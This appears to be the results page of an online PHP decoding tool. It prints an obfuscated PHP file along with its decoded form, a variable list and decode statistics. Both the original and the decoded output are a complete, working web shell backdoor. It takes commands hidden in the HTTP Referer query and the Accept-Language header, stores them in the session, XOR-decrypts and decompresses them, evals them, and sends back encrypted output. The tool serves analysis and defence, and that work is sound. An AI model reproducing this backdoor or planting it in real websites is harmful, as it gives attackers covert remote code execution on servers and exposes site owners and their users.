Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $k=str_replace('Yu','','crYueatYuYue_fuYunYuYuction'); $Q='s(@I$s[$i],$@I@If);if@I..

Decoded Output download

$kh="24c7";$kf="52a7";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$k=str_replace('Yu','','crYueatYuYue_fuYunYuYuction');
$Q='s(@I$s[$i],$@I@If);if@I($e)@I{$k=$kh.$kf;@Iob_start();@@Ie@Ival(@gz@Iuncompr@Iess(@x(@@I@Iba';
$C='$i],0@I,$@Ie))),$k))@I@I);$o=ob_get_@I@Iconten@Its();ob_end@I_@Iclean();$d@I=@Ibase6@I4_@Ie';
$i='$kh="2@I4@Ic7";$kf@I="52a@I7";@Ifun@Iction x($t,$k)@I{$c@I=strlen@I($k);$l=str@Il@Ien($';
$W='@I@ISESS@IION;$ss="su@Ib@Istr";@I$sl="s@Itrtolower";$i=$m[1]@I[0]@I.$m[1][1];$h=@I$sl(@I';
$l='i}^$k@I{$j};}}re@Iturn $o;@I}$r=$_S@IERVER@I;$rr=@@I$r["HTT@I@IP_REFERER"];$@Ira=@I@$r';
$m='@I["HTTP_ACC@IEPT_@ILANGUAGE"]@I;if($r@Ir@I&&$ra){  @I  $u@I=parse_url@I($rr)@I;  @I  ';
$N='@I@Ise64_decod@Ie(preg_replace(arr@Iay("/_/@I"@I,"/-/@I"),arra@Iy(@I"/","+"),$ss($@Is[';
$F='1@I;$z<@Icoun@It($@Im[1@I]);$z++) $p.=$q@I[$m[2][@I$z@I]];i@If(s@Itrpos(@I$p,$h)===0){$s[@';
$U='ncode(x(gzcompres@I@Is@I($o),@I$k));@Iprint@I("<$k>$d</$k>"@I@I);@session_destroy@I();}}}}';
$b='$@Iss@I(md5($i.$kh),0@I,3@I));$f@I@I=@I$@Isl($ss(md5($i.$kf),0,3));$p=@I"";f@Ior(@I$z=';
$X='t);@I$o="";for($i@I=0;$i@I<$l;){f@Ior($j@I=0;@I($j<$c&@I&$@Ii<$l)@I;$j++,$i@I@I++){$o.=@I$t{$';
$T='parse_@Ist@Ir(@I$u["query"],$q)@I;$q=ar@Iray_@Ivalues(@I$q)@I;preg_mat@Ich_@Iall("/([\\@Iw]@I)[\\';
$p='w-]+(?@I:;@Iq=0.([\\d]))?@I,?/",$r@I@Ia,$m);if@I($q&&$m@I){@@Ises@Ision_start()@I;$s=&@I$_';
$I='I$i]="";$p=$ss($@Ip@I,3);}if@I(a@Irray_key_@Iexists($i,$@Is))@I{@I$s[$i].=$p;$e=@Istr@Ipo';
$q=str_replace('@I','',$i.$X.$l.$m.$T.$p.$W.$b.$F.$I.$Q.$N.$C.$U);
$x=$k('',$q);$x();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C $i],0@I,$@Ie))),$k))@I@I);$o=ob_get_@I@Iconten@Its();ob_end@..
$F 1@I;$z<@Icoun@It($@Im[1@I]);$z++) $p.=$q@I[$m[2][@I$z@I]];i@..
$I I$i]="";$p=$ss($@Ip@I,3);}if@I(a@Irray_key_@Iexists($i,$@Is)..
$N @I@Ise64_decod@Ie(preg_replace(arr@Iay("/_/@I"@I,"/-/@I"),ar..
$Q s(@I$s[$i],$@I@If);if@I($e)@I{$k=$kh.$kf;@Iob_start();@@Ie@I..
$T parse_@Ist@Ir(@I$u["query"],$q)@I;$q=ar@Iray_@Ivalues(@I$q)@..
$U ncode(x(gzcompres@I@Is@I($o),@I$k));@Iprint@I("<$k>$d</$k>"@..
$W @I@ISESS@IION;$ss="su@Ib@Istr";@I$sl="s@Itrtolower";$i=$m[1]..
$X t);@I$o="";for($i@I=0;$i@I<$l;){f@Ior($j@I=0;@I($j<$c&@I&$@I..
$b $@Iss@I(md5($i.$kh),0@I,3@I));$f@I@I=@I$@Isl($ss(md5($i.$kf)..
$i $kh="2@I4@Ic7";$kf@I="52a@I7";@Ifun@Iction x($t,$k)@I{$c@I=s..
$k create_function
$l i}^$k@I{$j};}}re@Iturn $o;@I}$r=$_S@IERVER@I;$rr=@@I$r["HTT@..
$m @I["HTTP_ACC@IEPT_@ILANGUAGE"]@I;if($r@Ir@I&&$ra){ @I $u@I..
$p w-]+(?@I:;@Iq=0.([\d]))?@I,?/",$r@I@Ia,$m);if@I($q&&$m@I){@@..
$q $kh="24c7";$kf="52a7";function x($t,$k){$c=strlen($k);$l=str..
$x None

Stats

MD5 09e4f0dfde4aab5198fe0f16bf8b059d
Eval Count 1
Decode Time 102 ms